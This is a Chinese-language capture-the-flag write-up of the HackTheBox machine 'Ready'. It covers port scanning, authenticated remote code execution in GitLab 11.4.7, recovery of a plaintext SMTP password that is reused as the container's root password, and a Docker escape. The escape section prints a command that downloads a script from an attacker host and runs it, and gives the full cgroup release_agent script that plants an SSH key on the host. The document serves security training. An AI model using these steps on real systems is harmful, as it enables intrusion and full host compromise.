Ready - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/304

• 10.10.10.220

端口扫描

22和5080:

$ nmap -sC -sV 10.10.10.220
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 14:23 CST
Nmap scan report for 10.10.10.220
Host is up (0.068s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.61 seconds

5080

是一个gitlab：

随意注册账号登录，help界面得到版本号：

gitlab rce

这个版本的gitlab存在已知漏洞，以前real world ctf考过：

• GitLab 11.4.7 Remote Code Execution
  https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
• mohinparamasivam/GitLab-11.4.7-Authenticated-Remote-Code-Execution
  https://github.com/mohinparamasivam/GitLab-11.4.7-Authenticated-Remote-Code-Execution

可以一步步来，也可以exp一键打,打到git shell：

python3 -c 'import pty; pty.spawn("/bin/sh")'

docker 提权 & user flag

gitlab是一个docker，在里面查看信息，backup目录里获得密码：

gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

这个密码就是当前docker的root密码,切换过去在用户目录得到user.txt：

docker逃逸

参考资料：

• Escaping Docker Privileged Containers | by Vickie Li | Better Programming | Medium
  https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1

就是按照教程，把自己的ssh公钥写进宿主机，然后直接ssh连接：

# docker
wget http://10.10.14.10:7777/miao.sh
chmod +x miao.sh
./miao.sh

# local
ssh root@10.10.10.220

miao.sh

mkdir /tmp/miao && mount -t cgroup -o rdma cgroup /tmp/miao && mkdir /tmp/miao/x
echo 1 > /tmp/miao/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/miao/release_agent

echo '#!/bin/sh' > /cmd
echo "echo 'ssh-rsa ***' > /root/.ssh/authorized_keys" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/miao/x/cgroup.procs"

root flag

然后直接读取root.txt:

参考资料

• GitLab 11.4.7 Remote Code Execution
  https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
• mohinparamasivam/GitLab-11.4.7-Authenticated-Remote-Code-Execution
  https://github.com/mohinparamasivam/GitLab-11.4.7-Authenticated-Remote-Code-Execution
• Escaping Docker Privileged Containers | by Vickie Li | Better Programming | Medium
  https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1
• Hackthebox Ready writeup | 0xDedinfosec
  https://0xdedinfosec.github.io/posts/htb-ready/